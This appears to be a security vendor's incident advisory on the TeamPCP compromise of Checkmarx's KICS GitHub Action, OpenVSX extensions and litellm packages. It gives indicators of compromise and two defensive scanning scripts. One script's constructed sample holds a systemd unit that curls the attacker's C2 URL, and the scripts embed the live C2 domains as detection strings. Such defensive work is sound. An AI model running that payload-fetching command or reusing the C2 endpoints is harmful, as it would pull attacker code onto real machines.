The KICS GitHub Action was compromised with credential-stealing malware by TeamPCP, the same group behind the Trivy attack. KICS is an open source infrastructure as code security scanner by Checkmarx. Between 12:58 and 16:50 UTC on March 23rd, any users of this GitHub Action who were pinning to one of the compromised tags would have been served the malware. The repository was taken down at 16:50 UTC, shortly after a GitHub issue was filed by a user notifying the maintainers of the incident.
The action was available at https://github.com/Checkmarx/kics-github-action prior to takedown.
Update 03/24:
11:30 UTC: The “litellm” packages (versions 1.82.7 and 1.82.8) on PyPI have been trojanized. They contain the same functionality as the earlier operation, but use a new exfiltration domain: models.litellm[.]cloud. The malicious update was published at approximately 8:30 UTC and was quarantined by PyPI at 11:25 UTC. Wiz customers can see an advisory in the Threat Center.
Updates 03/23:
19:24 UTC: The repository has been reinstated, and the maintainers state “The issue is resolved now.”
22:25 UTC: Sysdig reports that ast-github-action was also impacted. They were limited to observing a single malicious tag, 2.3.28; however, based on TeamPCP's tactics, we believe it is likely that all tags were impacted.
22:35 UTC: Based on a tip from independent researcher Adnan Khan, Wiz has confirmed that the Checkmarx OpenVSX extensions cx-dev-assist 1.7.0 and ast-results 2.53.0 were compromised. This was concurrently reported by ReversingLabs via tweet. See the “OpenVSX Payload” section below for details. We have reported these to OpenVSX for removal.
Update 03/24 9:00 UTC: Checkmarx have published a Security Update addressing the issues with the KICS GitHub action and OpenVSX plugins. They state a resolution time of 15:41 UTC for OpenVSX; however, we observed that the malicious versions were still present at the time of our report. Additionally, while new versions have been pushed, the malicious versions have yet to be removed.
This is the second popular open source security scanner that this group has compromised in the last 5 days. The operation uses familiar naming conventions and the same RSA public key, allowing Wiz to assess with high confidence that it is the same actor.
KICS GitHub Action Payload
The malicious code was injected in the same manner as in the Trivy incident:
- The attacker staged imposter commits (commits on a fork of the repository) containing their payload.
[Screenshot: setup.sh]
- The attacker then used what appears to be a compromised identity to directly update all 35 tags in the project and point them at these staged commits.
The malware also functions similarly, but with a few key differences:
- This version uses a new C2 domain: checkmarx[.]zone.
- The new version creates a docs-tpcp repository via the victim's GITHUB_TOKEN as a fallback in case of C2 disruption. In the Trivy incident, tpcp-docs was used instead.
- This version adds Kubernetes-focused persistence code, in addition to the existing credential stealing and exfiltration code.
While kics-github-action has ~1% of the visible public usage of trivy-action, it is still broadly adopted, publicly and privately, as an Infrastructure as Code security scanner.
We will update this post with further analysis.
GitHub Compromise
The attack appears to have been accomplished via the compromise of the cx-plugins-releases (GitHub ID 225848595) service account, as that is the identity involved in publishing the malicious tags.
OpenVSX Payload
Both compromised extensions (ast-results v2.53.0 and cx-dev-assist v1.7.0) contained identical payloads. They were published 12 seconds apart at 12:53 UTC on March 23, 2026, via the ast-phoenix account on Open VSX. The VS Code Marketplace versions appear unaffected.
Payload Execution Flow
On activation of the extension, the new malicious environmentAuthChecker.js is invoked from activateCore.js. This payload first checks whether the victim has credentials for at least one cloud provider.
If any credentials are detected, the second-stage payload is retrieved from the C2: checkmarx[.]zone/static/checkmarx-util-1.0.4.tgz
The payload attempts execution via npx, bunx, pnpx, or yarn dlx, which covers the major JavaScript package managers. The retrieved package contains a complete credential stealer.
Harvested credentials are then encrypted, using the same keys as elsewhere in this campaign, and exfiltrated to checkmarx[.]zone/vsxastpcp.tar.gz.
On non-CI systems, the malware installs persistence via a systemd user service. The persistence script polls https://checkmarx[.]zone/raw every 50 minutes for additional payloads, with a kill switch that aborts if the response contains “youtube”. Currently, the link redirects to The Show Must Go On by Queen.
Compromised Artifacts
OpenVSX Extensions
| Artifact | SHA256 |
|---|---|
| ast-results-2.53.0.vsix | 65bd72fcddaf938cefdf55b3323ad29f649a65d4ddd6aea09afa974dfc7f105d |
| cx-dev-assist-1.7.0.vsix | 744c9d61b66bcd2bb5474d9afeee6c00bb7e0cd32535781da188b80eb59383e0 |
| checkmarx-util-1.0.4.tgz | 0d66d8c7e02574ff0d3443de0585af19c903d12466d88573ed82ec788655975c |
| environmentAuthChecker.js | 527f795a201a6bc114394c4cfd1c74dce97381989f51a4661aafbc93a4439e90 |
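The execution flow and persistence mechanism above, together with the hash table, give a defender two concrete things to look for on a developer workstation: files whose SHA256 matches a listed artifact, and systemd user units that reference the C2 domain. The following script is an added example written for this post, not code from Wiz or Checkmarx. It embeds the hashes from the table and the C2 domains named in the text, scans a directory tree for hash matches, and scans a directory of `.service` files for the domain strings. The sample tree it builds is entirely constructed: the "stand-in" file is a harmless placeholder, so the demo keys its match on that file's own hash rather than on the real table (which only a real artifact could match).

```python
import hashlib
import tempfile
from pathlib import Path

# SHA256 values copied from the "OpenVSX Extensions" table above.
KNOWN_BAD_SHA256 = {
    "65bd72fcddaf938cefdf55b3323ad29f649a65d4ddd6aea09afa974dfc7f105d": "ast-results-2.53.0.vsix",
    "744c9d61b66bcd2bb5474d9afeee6c00bb7e0cd32535781da188b80eb59383e0": "cx-dev-assist-1.7.0.vsix",
    "0d66d8c7e02574ff0d3443de0585af19c903d12466d88573ed82ec788655975c": "checkmarx-util-1.0.4.tgz",
    "527f795a201a6bc114394c4cfd1c74dce97381989f51a4661aafbc93a4439e90": "environmentAuthChecker.js",
}

# Network indicators from the write-up, in real (non-defanged) form so they match file contents.
C2_INDICATORS = ("checkmarx.zone", "models.litellm.cloud")


def sha256_of(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 20), b""):
            h.update(chunk)
    return h.hexdigest()


def scan_tree_for_hashes(root, iocs: dict = KNOWN_BAD_SHA256) -> list[tuple[str, str]]:
    """Return (path, artifact name) for every regular file under root whose SHA256 is in iocs."""
    root = Path(root)
    hits = []
    if not root.is_dir():
        return hits
    for p in sorted(root.rglob("*")):
        if p.is_file():
            name = iocs.get(sha256_of(p))
            if name:
                hits.append((str(p), name))
    return hits


def scan_unit_files_for_c2(unit_dir) -> list[tuple[str, str]]:
    """Return (unit path, indicator) for systemd service units whose text references a C2 domain.
    On a real host unit_dir would be ~/.config/systemd/user, where user-level persistence lives."""
    unit_dir = Path(unit_dir)
    hits = []
    if not unit_dir.is_dir():
        return hits
    for unit in sorted(unit_dir.glob("*.service")):
        text = unit.read_text(errors="replace")
        for indicator in C2_INDICATORS:
            if indicator in text:
                hits.append((str(unit), indicator))
    return hits


def build_constructed_sample(root: Path) -> dict:
    """Write a constructed sample tree (nothing here is real malware): a benign extension file,
    a harmless stand-in for the loader, and two user units, one of which polls the C2 URL
    named in the text. Returns an IoC map keyed on the stand-in's own hash."""
    (root / "ext" / "benign").mkdir(parents=True)
    (root / "ext" / "benign" / "extension.js").write_text("module.exports = {};\n")
    stand_in = root / "ext" / "suspect" / "environmentAuthChecker.js"
    stand_in.parent.mkdir(parents=True)
    stand_in.write_text("// constructed stand-in, not the real loader\n")
    units = root / "systemd-user"
    units.mkdir()
    (units / "benign.service").write_text("[Service]\nExecStart=/usr/bin/true\n")
    (units / "update-check.service").write_text(
        "[Service]\nExecStart=/bin/sh -c 'curl -s https://checkmarx.zone/raw'\n"
    )
    return {sha256_of(stand_in): "environmentAuthChecker.js (constructed stand-in)"}


def run_demo() -> dict:
    """Build the constructed tree in a temp dir, run both scans, and summarise the hits."""
    with tempfile.TemporaryDirectory() as tmp:
        root = Path(tmp)
        iocs = build_constructed_sample(root)
        file_hits = scan_tree_for_hashes(root / "ext", iocs)
        unit_hits = scan_unit_files_for_c2(root / "systemd-user")
        return {
            "file_hits": [name for _, name in file_hits],
            "unit_hits": [Path(p).name for p, _ in unit_hits],
        }


if __name__ == "__main__":
    print(run_demo())
```

Against a real machine, call `scan_tree_for_hashes` on the VS Code extensions directory (typically `~/.vscode/extensions`) and `scan_unit_files_for_c2` on `~/.config/systemd/user`; a hash hit on any of the four listed artifacts, or a unit file carrying the C2 domain, is a strong indicator that the extension ran and should be followed by credential rotation.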
kics-github-action Releases
The v1.1 release was the only malicious release created. Other releases, triggered automatically by the tag events, failed because those versions already existed.
kics-github-action Tags
| Tag | Commit SHA |
|---|---|
| v1 | 0e22ec8d1e0dda3c62bf4beffcd4a8a5db1abda1 |
| v1.0 | 45f3749467a6017cb4fb749054b498d149dd5924 |
| v1.1 | 8e20c7a67bb95632e2040327a355fb97e6014d29 |
| v1.2 | 93de85c910d859b759cf9185aa78d5a23a4b7000 |
| v1.3 | 0e7343ba084735863db92b6f8ba2fa9dee604f7c |
| v1.4 | 2dc0fa613f6f4c15f26ad98225ad253475681616 |
| v1.5 | f00191dd3352c0cd83c6cce4e6bf04b628214dd0 |
| v1.6 | e0359b1a253ee66c8018586c3225e6e9cd2d8a4f |
| v1.6.1 | dc6dbf358998c0c64da83edc8fcd581c12656b19 |
| v1.6.2 | 08b9ea97eb292d5e1f9ac2d8e21c0ba32f0fdff0 |
| v1.6.3 | 005fb0837553de722f8bf11d98e905dbdde19861 |
| v1.7.0 | a5471d37c656ecd4560e8e0b3977910f27025618 |
| v2 | 3d49875ed47c6b8b4c8b50e0421418cf6b9f35f4 |
| v2.0.0 | 121c38fb49c9fc82160245fb6e2a9119db636e4d |
| v2.1.0 | 1e9eeaba37fe0032deba133f598e74dab0ceb3b7 |
| v2.1.1 | c5c07508527fc6a125855eebfb533e64f675bd8e |
| v2.1.2 | c999dbb9cc904e23675f9929f7e0e51d132879cf |
| v2.1.3 | 4ebf62dd8ff318412b38d19841fc3c8650e294bf |
| v2.1.4 | 3ae9f0d6f8139964635d411149f9b3e0a6eb935e |
| v2.1.5 | 96a0e8eb31c3cce6c495c9a49dd49c881cd17934 |
| v2.1.6 | 31fbf5831a2e52429738fdc0cbaa20e57872b6fc |
| v2.1.7 | fca3a20afcb8ec7f9932c060a236d2a9021fdd2b |
| v2.1.8 | 0f81f132f9f09bb4976d403914a44a1a1eb6158d |
| v2.1.9 | c0e23718a5074f3b8ad286f37b532e02057af35f |
| v2.1.10 | d66f0657133bc42f8264458063999bf1910490db |
| v2.1.11 | e35c9d6a5faffc1c5b3450d0bf09006aa9b9e906 |
| v2.1.12 | 2eee333d70fb6e14ce1d4aa73f12058bc5d70193 |
| v2.1.13 | f9641eb512f5c6530d13275903e8a97baf0925f1 |
| v2.1.14 | e8754eebc822b5122e96a6142b28dbc0e179c91c |
| v2.1.15 | 69b3f020390222a9fcb6029ba56533b2fb12f103 |
| v2.1.16 | db942a0dd7e9d1aeac72bc675bdb67f39a688b63 |
| v2.1.17 | 208813bf5feca5df9a935363cd426bc914614d0b |
| v2.1.18 | 3fdeadb81fbeddc1453163cc87bc173911fd47e2 |
| v2.1.19 | 310734c0ffd29438f6195a24e2cbbacfdc33c9ab |
| v2.1.20 | b974e53df1e3a2cd22ea90f0ec01882394feede4 |
Which actions should security teams take?
- Audit KICS GitHub Actions references: Review workflows using kics-github-action. If you referenced a version tag rather than a SHA, check workflow run logs from the exposure window for indicators of compromise.
- Search for exfiltration artifacts: Look for repositories named docs-tpcp in your GitHub organization, which may indicate successful exfiltration via the fallback mechanism.
- Long-term hardening: Refer to Wiz's How to Harden GitHub Actions: The Unofficial Guide.
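The first two steps above, auditing workflow references and looking for the fallback exfiltration repository, can be scripted. The following is an added example written for this post, not a Wiz or Checkmarx tool. It embeds the tag-to-commit table published above, scans workflow text for `uses: checkmarx/kics-github-action@<ref>` lines, and classifies each reference: a mutable tag from the table (which pointed at a malicious commit during the window), a SHA pin that matches one of the staged commits, or a SHA pin outside that set. It also filters a list of repository names for the `docs-tpcp` name used here and the `tpcp-docs` name from the Trivy incident. The sample workflow is constructed, and the third SHA in it is a deliberately fake placeholder, not a real commit.

```python
import re
from dataclasses import dataclass

# Tag -> commit SHA pairs from the "kics-github-action Tags" table above. Every one of these
# commits is attacker-staged; a workflow that resolved to any of them in the window ran the payload.
MALICIOUS_TAG_COMMITS = {
    "v1": "0e22ec8d1e0dda3c62bf4beffcd4a8a5db1abda1", "v1.0": "45f3749467a6017cb4fb749054b498d149dd5924",
    "v1.1": "8e20c7a67bb95632e2040327a355fb97e6014d29", "v1.2": "93de85c910d859b759cf9185aa78d5a23a4b7000",
    "v1.3": "0e7343ba084735863db92b6f8ba2fa9dee604f7c", "v1.4": "2dc0fa613f6f4c15f26ad98225ad253475681616",
    "v1.5": "f00191dd3352c0cd83c6cce4e6bf04b628214dd0", "v1.6": "e0359b1a253ee66c8018586c3225e6e9cd2d8a4f",
    "v1.6.1": "dc6dbf358998c0c64da83edc8fcd581c12656b19", "v1.6.2": "08b9ea97eb292d5e1f9ac2d8e21c0ba32f0fdff0",
    "v1.6.3": "005fb0837553de722f8bf11d98e905dbdde19861", "v1.7.0": "a5471d37c656ecd4560e8e0b3977910f27025618",
    "v2": "3d49875ed47c6b8b4c8b50e0421418cf6b9f35f4", "v2.0.0": "121c38fb49c9fc82160245fb6e2a9119db636e4d",
    "v2.1.0": "1e9eeaba37fe0032deba133f598e74dab0ceb3b7", "v2.1.1": "c5c07508527fc6a125855eebfb533e64f675bd8e",
    "v2.1.2": "c999dbb9cc904e23675f9929f7e0e51d132879cf", "v2.1.3": "4ebf62dd8ff318412b38d19841fc3c8650e294bf",
    "v2.1.4": "3ae9f0d6f8139964635d411149f9b3e0a6eb935e", "v2.1.5": "96a0e8eb31c3cce6c495c9a49dd49c881cd17934",
    "v2.1.6": "31fbf5831a2e52429738fdc0cbaa20e57872b6fc", "v2.1.7": "fca3a20afcb8ec7f9932c060a236d2a9021fdd2b",
    "v2.1.8": "0f81f132f9f09bb4976d403914a44a1a1eb6158d", "v2.1.9": "c0e23718a5074f3b8ad286f37b532e02057af35f",
    "v2.1.10": "d66f0657133bc42f8264458063999bf1910490db", "v2.1.11": "e35c9d6a5faffc1c5b3450d0bf09006aa9b9e906",
    "v2.1.12": "2eee333d70fb6e14ce1d4aa73f12058bc5d70193", "v2.1.13": "f9641eb512f5c6530d13275903e8a97baf0925f1",
    "v2.1.14": "e8754eebc822b5122e96a6142b28dbc0e179c91c", "v2.1.15": "69b3f020390222a9fcb6029ba56533b2fb12f103",
    "v2.1.16": "db942a0dd7e9d1aeac72bc675bdb67f39a688b63", "v2.1.17": "208813bf5feca5df9a935363cd426bc914614d0b",
    "v2.1.18": "3fdeadb81fbeddc1453163cc87bc173911fd47e2", "v2.1.19": "310734c0ffd29438f6195a24e2cbbacfdc33c9ab",
    "v2.1.20": "b974e53df1e3a2cd22ea90f0ec01882394feede4",
}
MALICIOUS_COMMITS = set(MALICIOUS_TAG_COMMITS.values())

# Matches `uses: checkmarx/kics-github-action@<ref>` (owner case-insensitive, optional quotes).
USES_RE = re.compile(r"uses:\s*['\"]?checkmarx/kics-github-action@([^\s'\"#]+)", re.IGNORECASE)
SHA_RE = re.compile(r"^[0-9a-f]{40}$")


@dataclass
class Finding:
    line: int
    ref: str
    kind: str      # "tag" or "sha"
    verdict: str


def classify_ref(ref: str) -> tuple[str, str]:
    """Decide what a single @ref means in light of the published tag table."""
    if SHA_RE.match(ref):
        if ref in MALICIOUS_COMMITS:
            return "sha", "pinned to an attacker-staged commit: treat as compromised"
        return "sha", "pinned to a commit outside the malicious set"
    if ref in MALICIOUS_TAG_COMMITS:
        return "tag", "mutable tag that pointed at a malicious commit during the window: review run logs"
    return "tag", "mutable tag not in the published table: still replace with a SHA pin"


def audit_workflow(text: str) -> list[Finding]:
    """Scan one workflow file's text and return a Finding per kics-github-action reference."""
    findings = []
    for n, line in enumerate(text.splitlines(), start=1):
        m = USES_RE.search(line)
        if m:
            kind, verdict = classify_ref(m.group(1))
            findings.append(Finding(n, m.group(1), kind, verdict))
    return findings


def find_exfil_repos(repo_names) -> list[str]:
    """Filter an org's repository names for the fallback exfiltration repo names seen in this campaign."""
    return [r for r in repo_names if r.lower() in {"docs-tpcp", "tpcp-docs"}]


# Constructed sample workflow (not from any real repository) exercising each case.
SAMPLE_WORKFLOW = """\
name: IaC scan
on: [push]
jobs:
  kics:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Run KICS (tag pin)
        uses: checkmarx/kics-github-action@v2.1.20
      - name: Run KICS (SHA pin that matches the table)
        uses: Checkmarx/kics-github-action@8e20c7a67bb95632e2040327a355fb97e6014d29
      - name: Run KICS (SHA pin, constructed placeholder commit)
        uses: "checkmarx/kics-github-action@0123456789abcdef0123456789abcdef01234567"
"""

if __name__ == "__main__":
    for f in audit_workflow(SAMPLE_WORKFLOW):
        print(f"line {f.line}: @{f.ref} [{f.kind}] -> {f.verdict}")
    print(find_exfil_repos(["infra", "docs-tpcp", "website"]))
```

Run `audit_workflow` over the text of every file under `.github/workflows/` in each repository; any tag-pinned reference is the case the guidance above flags for run-log review, and a SHA pin is only safe when the SHA is outside the malicious set. Repository names for `find_exfil_repos` can be taken from whatever org listing your tooling already produces.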
How can Wiz assist?
Wiz customers should continue to monitor the advisory in the Wiz Threat Center for ongoing guidance, pre-built queries, and references to relevant detections they can use to assess the risk in their environment.
Worried you've been impacted? Connect with the Wiz Incident Response team.